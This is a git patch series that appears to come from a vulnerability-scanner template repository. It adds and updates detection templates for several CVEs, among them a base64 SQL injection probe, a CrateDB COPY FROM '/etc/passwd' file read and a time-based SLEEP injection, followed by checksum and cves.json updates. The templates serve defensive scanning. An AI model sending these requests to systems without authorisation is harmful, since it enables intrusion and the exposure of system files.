http/cves/2024/CVE-2024-27718.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2024/CVE-2024-27718.yaml diff --git a/http/cves/2024/CVE-2024-27718.yaml b/http/cves/2024/CVE-2024-27718.yaml new file mode 100644 index 0000000000..c7ecc3bfc8 --- /dev/null +++ b/http/cves/2024/CVE-2024-27718.yaml @@ -0,0 +1,44 @@ +id: CVE-2024-27718 + +info: + name: Smart s200 Management Platform v.S200 - SQL Injection + author: DhiyaneshDk + severity: high + description: | + SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component. + reference: + - https://github.com/tldjgggg/cve/blob/main/sql.md + classification: + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + verified: true + max-request: 1 + fofa-query: body="Smart管理平台" + tags: cve,cve2024,smart-s45f,sqli + +variables: + num: "{{rand_int(9000000, 9999999)}}" + cmd: "select+9,md5({{num}}),9" + +http: + - raw: + - | + GET /importexport.php?sql={{base64(cmd)}}&type=exportexcelbysql HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{md5(num)}}" + + - type: word + part: header + words: + - 'application/octet-stream' + + - type: status + status: + - 200 From 1ed03e3a904f9171528074d4f9ed91a380539453 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 18 Jun 2024 14:49:55 +0530 Subject: [PATCH 0311/1841] lint fix --- http/cves/2024/CVE-2024-27718.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-27718.yaml b/http/cves/2024/CVE-2024-27718.yaml index c7ecc3bfc8..7f980a8ee7 100644 --- a/http/cves/2024/CVE-2024-27718.yaml +++ b/http/cves/2024/CVE-2024-27718.yaml @@ -33,7 +33,7 @@ http: part: body words: - "{{md5(num)}}" - + - type: word part: header words: From 47332e6b2f631b6b3c5c7c8934caa2d785d61cda Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 18 Jun 2024 15:17:38 +0530 Subject: [PATCH 0312/1841] Create CVE-2024-24565.yaml --- http/cves/2024/CVE-2024-24565.yaml | 58 ++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 http/cves/2024/CVE-2024-24565.yaml diff --git a/http/cves/2024/CVE-2024-24565.yaml b/http/cves/2024/CVE-2024-24565.yaml new file mode 100644 index 0000000000..7cfb0b9759 --- /dev/null +++ b/http/cves/2024/CVE-2024-24565.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-24565 + +info: + name: CrateDB Database - Arbitrary File Read + author: DhiyaneshDK + severity: medium + description: | + CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-24565 + cwe-id: CWE-22 + epss-score: 0.0005 + epss-percentile: 0.18617 + cpe: cpe:2.3:a:cratedb:cratedb:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: cratedb + product: cratedb + fofa-query: title="CrateDB" + tags: cve,cve2024,cratedb,lfi,info-leak,intrusive + +variables: + table_name: "{{to_lower(rand_text_alpha(8))}}" + +http: + - raw: + - | + POST /_sql?types HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json; charset=UTF-8 + + {"stmt":"CREATE TABLE {{table_name}}(info_leak STRING)"} + + - | + POST /_sql?types HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json; charset=UTF-8 + + {"stmt":"COPY {{table_name}} FROM '/etc/passwd' with (format='csv', header=false)"} + + - | + POST /_sql?types HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json; charset=UTF-8 + + {"stmt":"SELECT * FROM {{table_name}} limit 100"} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200" + - "contains(body_3, 'root:')" + - "contains_all(header, 'application/json')" + condition: and From 7a788d34cfae05cb2c2483ba0e0f51c5034fc6cf Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 18 Jun 2024 15:21:51 +0530 Subject: [PATCH 0313/1841] Update CVE-2024-31750.yaml --- http/cves/2024/CVE-2024-31750.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-31750.yaml b/http/cves/2024/CVE-2024-31750.yaml index 39194f53a7..bc0844fb11 100644 --- a/http/cves/2024/CVE-2024-31750.yaml +++ b/http/cves/2024/CVE-2024-31750.yaml @@ -1,7 +1,7 @@ id: CVE-2024-31750 info: - name: F-logic DataCube3 Sql Injection + name: F-logic DataCube3 - SQL Injection author: DhiyaneshDK severity: high description: | @@ -13,6 +13,7 @@ info: - https://github.com/wjlin0/poc-doc - https://github.com/wy876/POC classification: + cve-id: CVE-2024-31750 epss-score: 0.00043 epss-percentile: 0.0866 metadata: @@ -33,7 +34,7 @@ http: matchers: - type: dsl dsl: - - 'status_code==200' - 'contains(body, "qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq")' - 'contains(header, "application/json")' + - 'status_code==200' condition: and From 7d64bd1919e861e436f5027c0c3bbddd5a128ec3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 18 Jun 2024 15:26:21 +0530 Subject: [PATCH 0314/1841] updated matchers --- http/cves/2024/CVE-2024-2621.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-2621.yaml b/http/cves/2024/CVE-2024-2621.yaml index 9bf0b453a0..e1915699de 100644 --- a/http/cves/2024/CVE-2024-2621.yaml +++ b/http/cves/2024/CVE-2024-2621.yaml @@ -12,6 +12,7 @@ info: - https://vuldb.com/?id.257198 - https://github.com/NaInSec/CVE-LIST - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2024-2621 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L cvss-score: 6.3 @@ -28,14 +29,14 @@ info: http: - raw: - | - @timeout 10s - GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1 + @timeout 15s + GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - - "status_code == 200" - - "duration>=5" - - "contains_all(body,'msg','header','code')" + - 'duration>=6' + - 'status_code == 200' + - 'contains_all(body,"msg\":","header\":","code\":")' condition: and From baae4b87d315d1fd04ddd786074946e4023abff3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 18 Jun 2024 09:56:50 +0000 Subject: [PATCH 0315/1841] Auto Generated New Template Addition List [Tue Jun 18 09:56:49 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d8ce733d03..073acc474e 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ http/cves/2024/CVE-2024-0250.yaml http/cves/2024/CVE-2024-1728.yaml http/cves/2024/CVE-2024-23692.yaml http/cves/2024/CVE-2024-28995.yaml +http/cves/2024/CVE-2024-31750.yaml http/cves/2024/CVE-2024-32113.yaml http/cves/2024/CVE-2024-37393.yaml http/exposed-panels/lorex-panel.yaml From 3c828c7710767e7c2ba1cac146a8bee1af6c407a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 09:56:59 +0000 Subject: [PATCH 0316/1841] Auto Generated Templates Checksum [Tue Jun 18 09:56:59 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9222a42425..0e692169a1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3316,6 +3316,7 @@ http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 http/cves/2024/CVE-2024-31621.yaml:53f009e716d10910d474a4dec892fefd6524efae +http/cves/2024/CVE-2024-31750.yaml:db051c910a1115c1ad48343f839c54f2d31ca282 http/cves/2024/CVE-2024-31848.yaml:7897724f33b3fb2247e15f6c2904421c54586c6c http/cves/2024/CVE-2024-31849.yaml:3959023f6bd03c1ab24b2e711acd4683c98d8dbe http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca @@ -5344,8 +5345,8 @@ http/misconfiguration/collectd-exporter-metrics.yaml:c47a1526e0297b0f553cbd12b0f http/misconfiguration/command-api-explorer.yaml:ab22381f1611d06739015ed9ed6d87627905c86a http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b1b0fb3a0f16b90760a93b http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0 -http/misconfiguration/cookies-without-httponly.yaml:7ef8d2e87d18ddf8d322f344939689ef42c414cc -http/misconfiguration/cookies-without-secure.yaml:5a9d524aa06100448b7d3586c50e62560033d787 +http/misconfiguration/cookies-without-httponly.yaml:b7d3567792f6d1da6385c3c2393db6e65216cdf8 +http/misconfiguration/cookies-without-secure.yaml:624a1b5f88d0aff132d199eeffca11595bead000 http/misconfiguration/corebos-htaccess.yaml:01e578f80bbcf2552413ed4bf039cda8123fb19b http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce @@ -8657,7 +8658,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:885d565ac15bf0be3a16a5a731b6699bb23f29a7 +templates-checksum.txt:101dc779a447f023afdc2ddaca1133072de11866 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From be8bd9fb784871765ebbfd0c7b5cb617ef1e0a77 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 18 Jun 2024 09:57:41 +0000 Subject: [PATCH 0317/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 995321ea53..ef4fd1ef5f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -18,6 +18,7 @@ on: - 'http/cves/2024/CVE-2024-1728.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/cves/2024/CVE-2024-28995.yaml' + - 'http/cves/2024/CVE-2024-31750.yaml' - 'http/cves/2024/CVE-2024-32113.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' - 'http/exposed-panels/lorex-panel.yaml' From 04ae384f85fed5592b176de15a66a19f231bb4a9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 09:58:32 +0000 Subject: [PATCH 0318/1841] Auto Template Signing [Tue Jun 18 09:58:32 UTC 2024] :robot: --- http/cves/2024/CVE-2024-31750.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-31750.yaml b/http/cves/2024/CVE-2024-31750.yaml index bc0844fb11..50aa25d6b0 100644 --- a/http/cves/2024/CVE-2024-31750.yaml +++ b/http/cves/2024/CVE-2024-31750.yaml @@ -38,3 +38,4 @@ http: - 'contains(header, "application/json")' - 'status_code==200' condition: and +# digest: 4a0a00473045022100debf69f7baa1e23b7f3488c09e93e1909abfdc7a1ea2603f6dba2cb9c703544302203d8ecbf6c297515767d7ed66820e5a80fda576b6ed82be4d00362838d096b5bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 486663bbc8c4acf0ab52340954fc3ac042fce5b5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 18 Jun 2024 15:28:34 +0530 Subject: [PATCH 0319/1841] Update CVE-2020-8115.yaml --- http/cves/2020/CVE-2020-8115.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index d33d12190a..29bde95c57 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -48,7 +48,13 @@ http: regex: - (?mi)window\.location\.replace\(".*alert\(1337\) + - type: word + part: body + words: + - window.location.href.indexOf + negative: true + - type: status status: - 200 -# digest: 4b0a00483046022100ecd7675c422b5c9949a8ab6d201f35ee87e4502aad45359f825eb31c2f2fbd72022100aa92159e5d4b1010b07101e6b6f47d858170d3f8e97aa5db3c6c7a259bfe4b71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ecd7675c422b5c9949a8ab6d201f35ee87e4502aad45359f825eb31c2f2fbd72022100aa92159e5d4b1010b07101e6b6f47d858170d3f8e97aa5db3c6c7a259bfe4b71:922c64590222798bb761d5b6d8e72950 From 6a70e2ad01164ed08167a53bbeb852c8a72d74b9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 18 Jun 2024 15:29:50 +0530 Subject: [PATCH 0320/1841] updated matcher type --- http/cves/2024/CVE-2024-3274.yaml | 23 +++++++---------------- 1 file changed, 7 insertions(+), 16 deletions(-) diff --git a/http/cves/2024/CVE-2024-3274.yaml b/http/cves/2024/CVE-2024-3274.yaml index d5ee1c23ae..8bf36cd53f 100644 --- a/http/cves/2024/CVE-2024-3274.yaml +++ b/http/cves/2024/CVE-2024-3274.yaml @@ -1,7 +1,7 @@ id: CVE-2024-3274 info: - name: D-LINK DNS-320L,DNS-320LW and DNS-327L Information Disclosure via /cgi-bin/info.cgi + name: D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure author: DhiyaneshDk severity: medium description: | @@ -9,9 +9,7 @@ info: reference: - https://github.com/netsecfish/info_cgi - https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383 - - https://vuldb.com/?ctiid.259285 - - https://vuldb.com/?id.259285 - - https://vuldb.com/?submit.304706 + - https://nvd.nist.gov/vuln/detail/CVE-2024-3274 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 @@ -23,7 +21,7 @@ info: verified: true max-request: 1 fofa-query: body="Text:In order to access the ShareCenter" - tags: cve,cve2024,dlink,info-leak + tags: cve,cve2024,dlink,exposure http: - raw: @@ -31,16 +29,9 @@ http: GET /cgi-bin/info.cgi HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - - type: word - part: body - words: - - "Model=" - - "Build=" - - "Macaddr=" + - type: dsl + dsl: + - 'contains_all(body, "Model=", "Build=", "Macaddr=")' + - 'status_code == 200' condition: and - - - type: status - status: - - 200 From 70ab9368f018672035767a05e40595217200d8e6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 10:00:21 +0000 Subject: [PATCH 0321/1841] Auto Generated Templates Checksum [Tue Jun 18 10:00:21 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0e692169a1..f3903b9855 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3298,6 +3298,7 @@ http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 http/cves/2024/CVE-2024-25735.yaml:62e4fcd344865c267789835cfbc7bd1677e002d3 +http/cves/2024/CVE-2024-2621.yaml:622f5f4912ee967b2fc330babc1eeeffcbe882b2 http/cves/2024/CVE-2024-26331.yaml:1f13e279312f16452413eae02b0cb32971d720f8 http/cves/2024/CVE-2024-27198.yaml:428b5bbb2a88c48db434e13c0fdc3dea195f4a6f http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d @@ -3316,7 +3317,7 @@ http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 http/cves/2024/CVE-2024-31621.yaml:53f009e716d10910d474a4dec892fefd6524efae -http/cves/2024/CVE-2024-31750.yaml:db051c910a1115c1ad48343f839c54f2d31ca282 +http/cves/2024/CVE-2024-31750.yaml:79b602d5b722a6a716b628652d2dd2955b50e4a1 http/cves/2024/CVE-2024-31848.yaml:7897724f33b3fb2247e15f6c2904421c54586c6c http/cves/2024/CVE-2024-31849.yaml:3959023f6bd03c1ab24b2e711acd4683c98d8dbe http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca @@ -8658,7 +8659,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:101dc779a447f023afdc2ddaca1133072de11866 +templates-checksum.txt:5ed2312430930175d44fc75cf5d0628b5fbef212 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b4a9564f2c2521cb3cf3a834315321a433c0a4a2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 10:00:22 +0000 Subject: [PATCH 0322/1841] Auto Generated cves.json [Tue Jun 18 10:00:22 UTC 2024] :robot: --- cves.json | 11 +++++++++-- cves.json-checksum.txt | 2 +- 2 files changed, 10 insertions(+), 3 deletions(-) diff --git a/cves.json b/cves.json index dc2254fad5..841bf55dd1 100644 --- a/cves.json +++ b/cves.json @@ -669,7 +669,6 @@ {"ID":"CVE-2019-12581","Info":{"Name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","Severity":"medium","Description":"Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-12581.yaml"} {"ID":"CVE-2019-12583","Info":{"Name":"Zyxel ZyWall UAG/USG - Account Creation Access","Severity":"critical","Description":"Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the \"Free Time\" component. This can lead to unauthorized network access or DoS attacks.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2019/CVE-2019-12583.yaml"} {"ID":"CVE-2019-12593","Info":{"Name":"IceWarp Mail Server \u003c=10.4.4 - Local File Inclusion","Severity":"high","Description":"IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-12593.yaml"} -{"ID":"CVE-2019-12616","Info":{"Name":"phpMyAdmin \u003c4.9.0 - Cross-Site Request Forgery","Severity":"medium","Description":"phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken \u003cimg\u003e tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2019/CVE-2019-12616.yaml"} {"ID":"CVE-2019-12725","Info":{"Name":"Zeroshell 3.9.0 - Remote Command Execution","Severity":"critical","Description":"Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-12725.yaml"} {"ID":"CVE-2019-12962","Info":{"Name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","Severity":"medium","Description":"LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-12962.yaml"} {"ID":"CVE-2019-12985","Info":{"Name":"Citrix SD-WAN Center - Remote Command Injection","Severity":"critical","Description":"Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, pingCount, or packetSize, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-12985.yaml"} @@ -1467,6 +1466,7 @@ {"ID":"CVE-2021-43778","Info":{"Name":"GLPI plugin Barcode \u003c 2.6.1 - Path Traversal Vulnerability.","Severity":"high","Description":"Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43778.yaml"} {"ID":"CVE-2021-43798","Info":{"Name":"Grafana v8.x - Arbitrary File Read","Severity":"high","Description":"Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `\u003cgrafana_host_url\u003e/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43798.yaml"} {"ID":"CVE-2021-43810","Info":{"Name":"Admidio - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-43810.yaml"} +{"ID":"CVE-2021-43831","Info":{"Name":"Gradio \u003c 2.5.0 - Arbitrary File Read","Severity":"high","Description":"Files on the host computer can be accessed from the Gradio interface\n","Classification":{"CVSSScore":"7.7"}},"file_path":"http/cves/2021/CVE-2021-43831.yaml"} {"ID":"CVE-2021-44077","Info":{"Name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44077.yaml"} {"ID":"CVE-2021-44138","Info":{"Name":"Caucho Resin \u003e=4.0.52 \u003c=4.0.56 - Directory traversal","Severity":"high","Description":"There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44138.yaml"} {"ID":"CVE-2021-44139","Info":{"Name":"Alibaba Sentinel - Server-side request forgery (SSRF)","Severity":"high","Description":"There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44139.yaml"} @@ -2142,6 +2142,7 @@ {"ID":"CVE-2023-31446","Info":{"Name":"Cassia Gateway Firmware - Remote Code Execution","Severity":"critical","Description":"In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31446.yaml"} {"ID":"CVE-2023-31465","Info":{"Name":"TimeKeeper by FSMLabs - Remote Code Execution","Severity":"critical","Description":"An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31465.yaml"} {"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"} +{"ID":"CVE-2023-32068","Info":{"Name":"XWiki - Open Redirect","Severity":"medium","Description":"XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-32068.yaml"} {"ID":"CVE-2023-32077","Info":{"Name":"Netmaker - Hardcoded DNS Secret Key","Severity":"high","Description":"Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32077.yaml"} {"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"} {"ID":"CVE-2023-3219","Info":{"Name":"EventON Lite \u003c 2.1.2 - Arbitrary File Download","Severity":"medium","Description":"The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors\nto access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-3219.yaml"} @@ -2156,7 +2157,6 @@ {"ID":"CVE-2023-3345","Info":{"Name":"LMS by Masteriyo \u003c 1.6.8 - Information Exposure","Severity":"medium","Description":"The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-3345.yaml"} {"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"} {"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"} -{"ID":"CVE-2023-33584","Info":{"Name":"Enrollment System Project v1.0 - SQL Injection Authentication Bypass","Severity":"critical","Description":"Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the 